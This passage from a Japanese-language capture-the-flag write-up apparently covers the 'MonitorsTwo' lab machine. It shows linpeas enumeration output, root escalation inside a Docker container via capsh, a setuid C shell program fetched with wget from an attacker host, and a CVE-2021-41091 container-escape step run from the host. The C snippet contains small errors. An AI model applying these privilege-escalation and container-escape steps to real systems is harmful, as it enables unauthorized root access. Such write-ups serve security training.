/etc/ld.so.conf.d/libc.conf
- /usr/local/lib
/etc/ld.so.conf.d/x86_64-linux-gnu.conf
- /usr/local/lib/x86_64-linux-gnu
- /lib/x86_64-linux-gnu
- /usr/lib/x86_64-linux-gnu
/etc/ld.so.preload
╔══════════╣ Capabilities
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities
══╣ Current shell capabilities
CapInh: 0x00000000a00425f9=cap_chown,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_audit_write,cap_setfcap
CapPrm: 0x0000000000000000=
CapEff: 0x0000000000000000=
CapBnd: 0x00000000a00425f9=cap_chown,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_audit_write,cap_setfcap
CapAmb: 0x0000000000000000=
══╣ Parent process capabilities
CapInh: 0x00000000a00425f9=cap_chown,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_audit_write,cap_setfcap
CapPrm: 0x0000000000000000=
CapEff: 0x0000000000000000=
CapBnd: 0x00000000a00425f9=cap_chown,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_audit_write,cap_setfcap
CapAmb: 0x0000000000000000=
Files with capabilities (limited to 50):
╔══════════╣ Users with capabilities
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities
╔══════════╣ Files with ACLs (limited to 50)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#acls
files with acls in searched folders Not Found
╔══════════╣ Files (scripts) in /etc/profile.d/
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#profiles-files
total 8
drwxr-xr-x 2 root root 4096 Mar 22 13:21 .
drwxr-xr-x 1 root root 4096 Mar 21 10:49 ..
╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#init-init-d-systemd-and-rc-d
═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ No
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. No
═╣ Can I read shadow plists? ............ No
═╣ Can I write shadow plists? ........... No
═╣ Can I read opasswd file? ............. No
═╣ Can I write in network-scripts? ...... No
═╣ Can I read root folder? .............. No
╔══════════╣ Searching root files in home dirs (limit 30)
/home/
/root/
/var/www
╔══════════╣ Searching folders owned by me containing others files on it (limit 100)
╔══════════╣ Readable files belonging to root and readable by me but not world readable
╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
/dev/mqueue
/dev/shm
/run/apache2
/run/lock
/run/lock/apache2
/tmp
/tmp/linpeas.sh
/tmp/lol.sh
/tmp/sess_00d14c11f312c22eca9a3b37a5f243de
/tmp/sess_00f9a092efc131b08fa6f8ec3eee853d
/tmp/sess_012870d7abba2efff0de1481eff15f20
#)You_can_write_even_more_files_inside_last_directory
/var/cache/apache2/mod_cache_disk
/var/log/apache2
/var/tmp
╔══════════╣ Interesting GROUP writable files (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
Group www-data:
/var/log/apache2
/run/lock/apache2
/run/apache2
・・・省略
SUIDの項目を見てみると色々と権限がついているのがわかる。その中で以下GTFOに記載のあるcapshを試してみようと思う。
※ここら辺はGTFOを調べてみるとか、そのコマンドを試してみるとかして実際にやってみて判断したほうがいい。
capsh
/sbin/capsh --gid=0 --uid=0 --
上記実行後に権限を確認する。
whoami
root
OK!Dockerでの権限昇格成功!
Exploit実行
後はCVE-2021-41091で確認したサイトのExploitを実行するだけだじぇ。
※ここら辺の手法に関しては、以下の技術書『コンテナセキュリティ コンテナ化されたアプリケーションを保護する要素技術』を読んでいればExploitが何をしてるかスラスラわかったりするのでお勧め
以下setuid.cを作成
setuid.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main(void) {
setuid(0);
system(0);
system("/bin/bash")
return 0;
}
このファイルをDockerコンテナ内部に転送し、コンパイルする。
cd /tmp
wget http://10.10.14.3/setuid.c
--2023-05-01 09:40:43-- http://10.10.14.3/setuid.c
Connecting to 10.10.14.3:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 145 [text/x-csrc]
Saving to: 'setuid.c'
0K 100% 15.9M=0s
2023-05-01 09:40:43 (15.9 MB/s) - 'setuid.c' saved [145/145]
gcc setuid.c -o setuid
capability確認
capsh --print
Current: cap_chown,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_audit_write,cap_setfcap=eip
Bounding set =cap_chown,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_audit_write,cap_setfcap
Ambient set =
Current IAB: cap_chown,!cap_dac_override,!cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,!cap_linux_immutable,cap_net_bind_service,!cap_net_broadcast,!cap_net_admin,cap_net_raw,!cap_ipc_lock,!cap_ipc_owner,!cap_sys_module,!cap_sys_rawio,cap_sys_chroot,!cap_sys_ptrace,!cap_sys_pacct,!cap_sys_admin,!cap_sys_boot,!cap_sys_nice,!cap_sys_resource,!cap_sys_time,!cap_sys_tty_config,!cap_mknod,!cap_lease,cap_audit_write,!cap_audit_control,cap_setfcap,!cap_mac_override,!cap_mac_admin,!cap_syslog,!cap_wake_alarm,!cap_block_suspend,!cap_audit_read
Securebits: 00/0x0/1'b0
secure-noroot: no (unlocked)
secure-no-suid-fixup: no (unlocked)
secure-keep-caps: no (unlocked)
secure-no-ambient-raise: no (unlocked)
uid=0(root) euid=0(root)
gid=0(root)
groups=33(www-data)
Guessed mode: UNCERTAIN (0)
セッティングを行う。
setcap cap_setgid,cap_setuid=eip setuid
確認!!
getcap setuid
setuid cap_setgid,cap_setuid=eip
Dockerコンテナでのセッティングが完了したのでホスト環境でExploitを実行します!!!
marcus@monitorstwo:/var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged/tmp$ ./setuid
権限昇格完了!!!
まとめ
これで特権昇格に成功し、Root権限奪取に成功しました。
今回は特権昇格が異様に難しいと思ったら全然違うルートで攻めていくという、嵌められてしまったパターンでした。
難しかったぁ~
今回もセキュリティエンジニアの皆さんの助けになればなと思います。